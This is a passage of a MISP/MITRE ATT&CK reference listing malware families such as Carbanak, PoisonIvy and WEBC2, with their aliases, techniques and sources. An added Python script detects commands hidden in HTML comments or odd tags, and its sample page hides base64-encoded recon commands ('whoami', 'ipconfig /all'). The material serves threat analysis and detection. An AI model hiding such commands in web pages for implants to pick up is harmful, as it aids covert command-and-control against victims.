  • uses: misp-galaxy:mitre-attack-pattern="App Delivered via Email Attachment - T1434" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 7224. Table References

Links

https://attack.mitre.org/software/S0304

https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/

AndroidOS/MalLocker.B - S0524

[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) is a variant of a ransomware family targeting Android devices. It prevents the user from interacting with the UI by displaying a screen containing a ransom note over all other windows. (Citation: Microsoft MalLockerB)

The tag is: misp-galaxy:mitre-malware="AndroidOS/MalLocker.B - S0524"

AndroidOS/MalLocker.B - S0524 is also known as:

  • AndroidOS/MalLocker.B

Table 7225. Table References

Links

https://attack.mitre.org/software/S0524

https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/

Android/AdDisplay.Ashas - S0525

[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) is a variant of adware that has been distributed through multiple apps in the Google Play Store. (Citation: WeLiveSecurity AdDisplayAshas)

The tag is: misp-galaxy:mitre-malware="Android/AdDisplay.Ashas - S0525"

Android/AdDisplay.Ashas - S0525 is also known as:

  • Android/AdDisplay.Ashas

Table 7226. Table References

Links

https://attack.mitre.org/software/S0525

https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/

Trojan.Mebromi - S0001

[Trojan.Mebromi](https://attack.mitre.org/software/S0001) is BIOS-level malware that takes control of the victim system before the MBR is loaded. (Citation: Ge 2011)

The tag is: misp-galaxy:mitre-malware="Trojan.Mebromi - S0001"

Trojan.Mebromi - S0001 is also known as:

  • Trojan.Mebromi

Trojan.Mebromi - S0001 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Firmware - T1019" with estimative-language:likelihood-probability="almost-certain"

Table 7227. Table References

Links

http://www.symantec.com/connect/blogs/bios-threat-showing-again

https://attack.mitre.org/software/S0001

ANDROIDOS_ANSERVER.A - S0310

[ANDROIDOS_ANSERVER.A](https://attack.mitre.org/software/S0310) is Android malware that is unique because it uses encrypted content within a blog site for command and control. (Citation: TrendMicro-Anserver)

The tag is: misp-galaxy:mitre-malware="ANDROIDOS_ANSERVER.A - S0310"

ANDROIDOS_ANSERVER.A - S0310 is also known as:

  • ANDROIDOS_ANSERVER.A

ANDROIDOS_ANSERVER.A - S0310 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

Table 7228. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-uses-blog-posts-as-cc/

https://attack.mitre.org/software/S0310

Agent.btz - S0092

[Agent.btz](https://attack.mitre.org/software/S0092) is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. (Citation: Securelist Agent.btz)

The tag is: misp-galaxy:mitre-malware="Agent.btz - S0092"

Agent.btz - S0092 is also known as:

  • Agent.btz

Agent.btz - S0092 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7229. Table References

Links

https://attack.mitre.org/software/S0092

https://securelist.com/agent-btz-a-source-of-inspiration/58551/

Backdoor.Oldrea - S0093

[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a modular backdoor that was used by [Dragonfly](https://attack.mitre.org/groups/G0035) against energy companies since at least 2013. [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)(Citation: Symantec Dragonfly Sept 2017)

The tag is: misp-galaxy:mitre-malware="Backdoor.Oldrea - S0093"

Backdoor.Oldrea - S0093 is also known as:

  • Backdoor.Oldrea

  • Havex

Backdoor.Oldrea - S0093 has relationships with:

  • similar: misp-galaxy:tool="Havex RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7230. Table References

Links

https://attack.mitre.org/software/S0093

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers

https://vblocalhost.com/uploads/VB2021-Slowik.pdf

Trojan.Karagany - S0094

[Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for reconnaissance and linked to [Dragonfly](https://attack.mitre.org/groups/G0035). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from the Dream Loader malware, which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY)

The tag is: misp-galaxy:mitre-malware="Trojan.Karagany - S0094"

Trojan.Karagany - S0094 is also known as:

  • Trojan.Karagany

  • xFrost

  • Karagany

Trojan.Karagany - S0094 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1045" with estimative-language:likelihood-probability="almost-certain"

Table 7231. Table References

Links

https://attack.mitre.org/software/S0094

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://www.dragos.com/threat/dymalloy/

https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector

macOS.OSAMiner - S1048

[macOS.OSAMiner](https://attack.mitre.org/software/S1048) is a Monero mining trojan that was first observed in 2018; security researchers assessed [macOS.OSAMiner](https://attack.mitre.org/software/S1048) may have been circulating since at least 2015. [macOS.OSAMiner](https://attack.mitre.org/software/S1048) is known for embedding one run-only AppleScript into another, which helped the malware evade full analysis for five years due to a lack of Apple event (AEVT) analysis tools.(Citation: SentinelLabs reversing run-only applescripts 2021)(Citation: VMRay OSAMiner dynamic analysis 2021)

The tag is: misp-galaxy:mitre-malware="macOS.OSAMiner - S1048"

macOS.OSAMiner - S1048 is also known as:

  • macOS.OSAMiner

Table 7232. Table References

Links

https://attack.mitre.org/software/S1048

https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/

https://www.vmray.com/cyber-security-blog/osaminer-uses-applescripts-evade-detection-malware-analysis-spotlight/

OSX_OCEANLOTUS.D - S0352

[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a macOS backdoor used by [APT32](https://attack.mitre.org/groups/G0050). First discovered in 2015, it has been continually improved by [APT32](https://attack.mitre.org/groups/G0050) using a plugin architecture to extend its capabilities, specifically through .dylib files. [OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) can also determine its permission level and execute according to access type (root or user).(Citation: Unit42 OceanLotus 2017)(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)

The tag is: misp-galaxy:mitre-malware="OSX_OCEANLOTUS.D - S0352"

OSX_OCEANLOTUS.D - S0352 is also known as:

  • OSX_OCEANLOTUS.D

  • Backdoor.MacOS.OCEANLOTUS.F

Table 7233. Table References

Links

https://attack.mitre.org/software/S0352

https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/

https://unit42.paloaltonetworks.com/unit42-new-improved-macos-backdoor-oceanlotus/

https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html

T9000 - S0098

[T9000](https://attack.mitre.org/software/S0098) is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. (Citation: FireEye admin@338 March 2014) (Citation: Palo Alto T9000 Feb 2016)

The tag is: misp-galaxy:mitre-malware="T9000 - S0098"

T9000 - S0098 is also known as:

  • T9000

T9000 - S0098 has relationships with:

  • similar: misp-galaxy:tool="T9000" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1103" with estimative-language:likelihood-probability="almost-certain"

Table 7235. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/

https://attack.mitre.org/software/S0098

https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html

BS2005 - S0014

[BS2005](https://attack.mitre.org/software/S0014) is malware that was used by [Ke3chang](https://attack.mitre.org/groups/G0004) in spearphishing campaigns since at least 2011. (Citation: Mandiant Operation Ke3chang November 2014)

The tag is: misp-galaxy:mitre-malware="BS2005 - S0014"

BS2005 - S0014 is also known as:

  • BS2005

BS2005 - S0014 has relationships with:

  • similar: misp-galaxy:tool="Hoardy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="BS2005" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132" with estimative-language:likelihood-probability="almost-certain"

Table 7236. Table References

Links

https://attack.mitre.org/software/S0014

https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs

Sys10 - S0060

[Sys10](https://attack.mitre.org/software/S0060) is a backdoor that was used throughout 2013 by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)

The tag is: misp-galaxy:mitre-malware="Sys10 - S0060"

Sys10 - S0060 is also known as:

  • Sys10

Sys10 - S0060 has relationships with:

  • similar: misp-galaxy:malpedia="Sys10" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024" with estimative-language:likelihood-probability="almost-certain"

Table 7237. Table References

Links

https://attack.mitre.org/software/S0060

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

Lurid - S0010

[Lurid](https://attack.mitre.org/software/S0010) is a malware family that has been used by several groups, including [PittyTiger](https://attack.mitre.org/groups/G0011), in targeted attacks as far back as 2006. (Citation: Villeneuve 2014) (Citation: Villeneuve 2011)

The tag is: misp-galaxy:mitre-malware="Lurid - S0010"

Lurid - S0010 is also known as:

  • Lurid

  • Enfal

Lurid - S0010 has relationships with:

  • similar: misp-galaxy:malpedia="Enfal" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024" with estimative-language:likelihood-probability="almost-certain"

Table 7238. Table References

Links

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_dissecting-lurid-apt.pdf

https://attack.mitre.org/software/S0010

https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html

Dipsind - S0200

[Dipsind](https://attack.mitre.org/software/S0200) is a malware family of backdoors that appear to be used exclusively by [PLATINUM](https://attack.mitre.org/groups/G0068). (Citation: Microsoft PLATINUM April 2016)

The tag is: misp-galaxy:mitre-malware="Dipsind - S0200"

Dipsind - S0200 is also known as:

  • Dipsind

Dipsind - S0200 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1004" with estimative-language:likelihood-probability="almost-certain"

Table 7239. Table References

Links

https://attack.mitre.org/software/S0200

https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

DressCode - S0300

[DressCode](https://attack.mitre.org/software/S0300) is an Android malware family. (Citation: TrendMicro-DressCode)

The tag is: misp-galaxy:mitre-malware="DressCode - S0300"

DressCode - S0300 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1428" with estimative-language:likelihood-probability="almost-certain"

Table 7240. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/dresscode-potential-impact-enterprises/

https://attack.mitre.org/software/S0300

Carbanak - S0030

[Carbanak](https://attack.mitre.org/software/S0030) is a full-featured remote backdoor used by a group of the same name ([Carbanak](https://attack.mitre.org/groups/G0008)). It is intended for espionage, data exfiltration, and providing remote access to infected machines. (Citation: Kaspersky Carbanak) (Citation: FireEye CARBANAK June 2017)

The tag is: misp-galaxy:mitre-malware="Carbanak - S0030"

Carbanak - S0030 is also known as:

  • Carbanak

  • Anunak

Carbanak - S0030 has relationships with:

  • similar: misp-galaxy:malpedia="Carbanak" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 7241. Table References

Links

https://attack.mitre.org/software/S0030

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf

https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html

https://www.fox-it.com/en/news/blog/anunak-aka-carbanak-update/

RIPTIDE - S0003

[RIPTIDE](https://attack.mitre.org/software/S0003) is a proxy-aware backdoor used by [APT12](https://attack.mitre.org/groups/G0005). (Citation: Moran 2014)

The tag is: misp-galaxy:mitre-malware="RIPTIDE - S0003"

RIPTIDE - S0003 is also known as:

  • RIPTIDE

RIPTIDE - S0003 has relationships with:

  • similar: misp-galaxy:tool="Etumbot" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

Table 7242. Table References

Links

https://attack.mitre.org/software/S0003

https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

TinyZBot - S0004

[TinyZBot](https://attack.mitre.org/software/S0004) is a bot written in C# that was developed by [Cleaver](https://attack.mitre.org/groups/G0003). (Citation: Cylance Cleaver)

The tag is: misp-galaxy:mitre-malware="TinyZBot - S0004"

TinyZBot - S0004 is also known as:

  • TinyZBot

TinyZBot - S0004 has relationships with:

  • similar: misp-galaxy:tool="TinyZBot" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Disabling Security Tools - T1089" with estimative-language:likelihood-probability="almost-certain"

Table 7243. Table References

Links

https://attack.mitre.org/software/S0004

https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

RobbinHood - S0400

[RobbinHood](https://attack.mitre.org/software/S0400) is ransomware that was first observed being used in an attack against the Baltimore city government’s computer network.(Citation: CarbonBlack RobbinHood May 2019)(Citation: BaltimoreSun RobbinHood May 2019)

The tag is: misp-galaxy:mitre-malware="RobbinHood - S0400"

RobbinHood - S0400 is also known as:

  • RobbinHood

Table 7244. Table References

Links

https://attack.mitre.org/software/S0400

https://www.baltimoresun.com/politics/bs-md-ci-it-outage-20190507-story.html

https://www.carbonblack.com/2019/05/17/cb-tau-threat-intelligence-notification-robbinhood-ransomware-stops-181-windows-services-before-encryption/

CosmicDuke - S0050

[CosmicDuke](https://attack.mitre.org/software/S0050) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="CosmicDuke - S0050"

CosmicDuke - S0050 is also known as:

  • CosmicDuke

  • TinyBaron

  • BotgenStudios

  • NemesisGemina

CosmicDuke - S0050 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"

Table 7245. Table References

Links

https://attack.mitre.org/software/S0050

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

Doki - S0600

[Doki](https://attack.mitre.org/software/S0600) is a backdoor that uses a unique Dogecoin-based Domain Generation Algorithm and was first observed in July 2020. [Doki](https://attack.mitre.org/software/S0600) was used in conjunction with the [ngrok](https://attack.mitre.org/software/S0508) Mining Botnet in a campaign that targeted Docker servers in cloud platforms. (Citation: Intezer Doki July 20)

The tag is: misp-galaxy:mitre-malware="Doki - S0600"

Doki - S0600 is also known as:

  • Doki

Table 7246. Table References

Links

https://attack.mitre.org/software/S0600

https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/

HTTPBrowser - S0070

[HTTPBrowser](https://attack.mitre.org/software/S0070) is malware that has been used by several threat groups. (Citation: ThreatStream Evasion Analysis) (Citation: Dell TG-3390) It is believed to be of Chinese origin. (Citation: ThreatConnect Anthem)

The tag is: misp-galaxy:mitre-malware="HTTPBrowser - S0070"

HTTPBrowser - S0070 is also known as:

  • HTTPBrowser

  • Token Control

  • HttpDump

HTTPBrowser - S0070 has relationships with:

  • similar: misp-galaxy:tool="HTTPBrowser" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7247. Table References

Links

https://attack.mitre.org/software/S0070

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/

https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop

Mivast - S0080

[Mivast](https://attack.mitre.org/software/S0080) is a backdoor that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009). It was reportedly used in the Anthem breach. (Citation: Symantec Black Vine)

The tag is: misp-galaxy:mitre-malware="Mivast - S0080"

Mivast - S0080 is also known as:

  • Mivast

Mivast - S0080 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

Table 7248. Table References

Links

http://www.symantec.com/security_response/writeup.jsp?docid=2015-020623-0740-99&tabid=2

https://attack.mitre.org/software/S0080

https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf

Hikit - S0009

[Hikit](https://attack.mitre.org/software/S0009) is malware that has been used by [Axiom](https://attack.mitre.org/groups/G0001) for late-stage persistence and exfiltration after the initial compromise.(Citation: Novetta-Axiom)(Citation: FireEye Hikit Rootkit)

The tag is: misp-galaxy:mitre-malware="Hikit - S0009"

Hikit - S0009 is also known as:

  • Hikit

Hikit - S0009 has relationships with:

  • similar: misp-galaxy:tool="Hikit" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 7249. Table References

Links

https://attack.mitre.org/software/S0009

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html

Ngrok - S9000

The tag is: misp-galaxy:mitre-malware="Ngrok - S9000"

Ngrok - S9000 is also known as:

  • Ngrok

Table 7250. Table References

Links

https://attack.mitre.org/software/S9000

Rover - S0090

[Rover](https://attack.mitre.org/software/S0090) is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. (Citation: Palo Alto Rover)

The tag is: misp-galaxy:mitre-malware="Rover - S0090"

Rover - S0090 is also known as:

  • Rover

Rover - S0090 has relationships with:

  • similar: misp-galaxy:malpedia="Rover" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

Table 7251. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/

https://attack.mitre.org/software/S0090

Taidoor - S0011

[Taidoor](https://attack.mitre.org/software/S0011) is a remote access trojan (RAT) that has been used by Chinese government cyber actors to maintain access on victim networks.(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021) [Taidoor](https://attack.mitre.org/software/S0011) has primarily been used against Taiwanese government organizations since at least 2010.(Citation: TrendMicro Taidoor)

The tag is: misp-galaxy:mitre-malware="Taidoor - S0011"

Taidoor - S0011 is also known as:

  • Taidoor

Taidoor - S0011 has relationships with:

  • similar: misp-galaxy:tool="Taidoor" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024" with estimative-language:likelihood-probability="almost-certain"

Table 7252. Table References

Links

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf

https://attack.mitre.org/software/S0011

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a

WEBC2 - S0109

[WEBC2](https://attack.mitre.org/software/S0109) is a family of backdoor malware used by [APT1](https://attack.mitre.org/groups/G0006) as early as July 2006. [WEBC2](https://attack.mitre.org/software/S0109) backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server. (Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-malware="WEBC2 - S0109"

WEBC2 - S0109 is also known as:

  • WEBC2

WEBC2 - S0109 has relationships with:

  • similar: misp-galaxy:tool="WEBC2" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1038" with estimative-language:likelihood-probability="almost-certain"

Table 7253. Table References

Links

https://attack.mitre.org/software/S0109

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
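As an added example (not code from the MITRE, Mandiant or MISP sources cited here), the following Python triages a fetched page for the dead-drop pattern WEBC2 relies on, and which ANDROIDOS_ANSERVER.A above applies to blog content: text hidden in HTML comments or inside non-standard tags is extracted and, where it decodes as base64 to printable ASCII, reported as a candidate command. The sample page, the base64 encoding and the allow-list of ordinary tags are assumptions made for illustration; the real implants' encoding is not described on this page.

```python
"""Triage a web page for commands hidden in comments or non-standard tags.

Added example for the dead-drop C2 style described in the WEBC2 entry
(and used against blog content by ANDROIDOS_ANSERVER.A). The sample
page, the base64 encoding and the tag allow-list are assumptions made
for illustration, not details from the cited reports.
"""
import base64
import binascii
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional, Tuple

# Assumed: tags an ordinary content page is expected to use. Anything
# else is treated as a "special tag" whose text deserves inspection.
_COMMON_TAGS = {
    "html", "head", "title", "meta", "link", "body", "div", "span", "p",
    "a", "br", "ul", "ol", "li", "table", "tr", "td", "th", "img",
    "h1", "h2", "h3", "b", "i", "strong", "em", "script", "style",
}

# Hidden text shorter than this is treated as markup noise.
MIN_LEN = 8

# Assumed encoding: a run of base64 that decodes to printable ASCII.
_B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")


class _HiddenTextCollector(HTMLParser):
    """Collect comment bodies and the text inside non-standard tags."""

    def __init__(self) -> None:
        super().__init__()
        self.found: List[Tuple[str, str]] = []   # (location, text)
        self._special: List[str] = []            # open non-standard tags

    def handle_comment(self, data: str) -> None:
        self.found.append(("comment", data.strip()))

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag not in _COMMON_TAGS:
            self._special.append(tag)

    def handle_endtag(self, tag: str) -> None:
        if self._special and self._special[-1] == tag:
            self._special.pop()

    def handle_data(self, data: str) -> None:
        if self._special and data.strip():
            self.found.append((f"tag:{self._special[-1]}", data.strip()))


def extract_hidden_text(html: str) -> List[Tuple[str, str]]:
    """Return (location, text) for every comment and special-tag body."""
    parser = _HiddenTextCollector()
    parser.feed(html)
    parser.close()
    return parser.found


def decode_if_base64(text: str) -> Optional[str]:
    """Decode `text` if it is base64 of printable ASCII, else return None."""
    if not _B64_RE.match(text):
        return None
    try:
        raw = base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw and all(32 <= b < 127 for b in raw):
        return raw.decode("ascii")
    return None


def triage_page(html: str) -> List[Dict[str, str]]:
    """One finding per hidden text item that decodes to a plausible command."""
    findings = []
    for location, text in extract_hidden_text(html):
        if len(text) < MIN_LEN:
            continue
        decoded = decode_if_base64(text)
        if decoded is not None:
            findings.append({"location": location, "raw": text, "decoded": decoded})
    return findings


# Constructed sample page; not a capture of real WEBC2 traffic.
SAMPLE_PAGE = """<html><head><title>Company News</title></head>
<body>
<!-- generated by cms 2.1 -->
<p>Welcome to our site.</p>
<!-- Y21kIC9jIHdob2FtaQ== -->
<p>Latest update: quarterly results published.</p>
<ctrl>aXBjb25maWcgL2FsbA==</ctrl>
</body></html>"""


if __name__ == "__main__":
    for finding in triage_page(SAMPLE_PAGE):
        print(f"{finding['location']}: {finding['raw']} -> {finding['decoded']!r}")
```

The benign CMS comment is extracted but not reported, because it fails the base64 check; the two encoded items are reported with their location, so an analyst reviewing a proxy capture can tell a comment-based drop from a tag-based one. In practice the decoder would be swapped for whatever encoding the variant under analysis uses, and the allow-list tuned to the site being watched.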

Derusbi - S0021

[Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups.(Citation: Novetta-Axiom)(Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed.(Citation: Fidelis Turbo)

The tag is: misp-galaxy:mitre-malware="Derusbi - S0021"

Derusbi - S0021 is also known as:

  • Derusbi

  • PHOTO

Derusbi - S0021 has relationships with:

  • similar: misp-galaxy:malpedia="Derusbi (Windows)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Derusbi" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7254. Table References

Links

https://attack.mitre.org/software/S0021

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/

JPIN - S0201

[JPIN](https://attack.mitre.org/software/S0201) is a custom-built backdoor family used by [PLATINUM](https://attack.mitre.org/groups/G0068). Evidence suggests developers of [JPIN](https://attack.mitre.org/software/S0201) and [Dipsind](https://attack.mitre.org/software/S0200) code bases were related in some way. (Citation: Microsoft PLATINUM April 2016)

The tag is: misp-galaxy:mitre-malware="JPIN - S0201"

JPIN - S0201 is also known as:

  • JPIN

JPIN - S0201 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 7255. Table References

Links

https://attack.mitre.org/software/S0201

https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

PoisonIvy - S0012

[PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups.(Citation: FireEye Poison Ivy)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Darkmoon Aug 2005)

The tag is: misp-galaxy:mitre-malware="PoisonIvy - S0012"

PoisonIvy - S0012 is also known as:

  • PoisonIvy

  • Breut

  • Poison Ivy

  • Darkmoon

PoisonIvy - S0012 has relationships with:

  • similar: misp-galaxy:tool="Poison Ivy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="PoisonIvy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Poison Ivy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="poisonivy" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 7256. Table References

Links

https://attack.mitre.org/software/S0012

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf

https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaign

https://www.symantec.com/security_response/writeup.jsp?docid=2005-081910-3934-99

Kevin - S1020

[Kevin](https://attack.mitre.org/software/S1020) is a backdoor implant written in C++ that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2020, including in operations against organizations in Tunisia.(Citation: Kaspersky Lyceum October 2021)

The tag is: misp-galaxy:mitre-malware="Kevin - S1020"

Kevin - S1020 is also known as:

  • Kevin

Table 7257. Table References

Links

https://attack.mitre.org/software/S1020

https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf

Nerex - S0210

[Nerex](https://attack.mitre.org/software/S0210) is a Trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Nerex May 2012)

The tag is: misp-galaxy:mitre-malware="Nerex - S0210"

Nerex - S0210 is also known as:

  • Nerex

Nerex - S0210 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7258. Table References

Links

https://attack.mitre.org/software/S0210

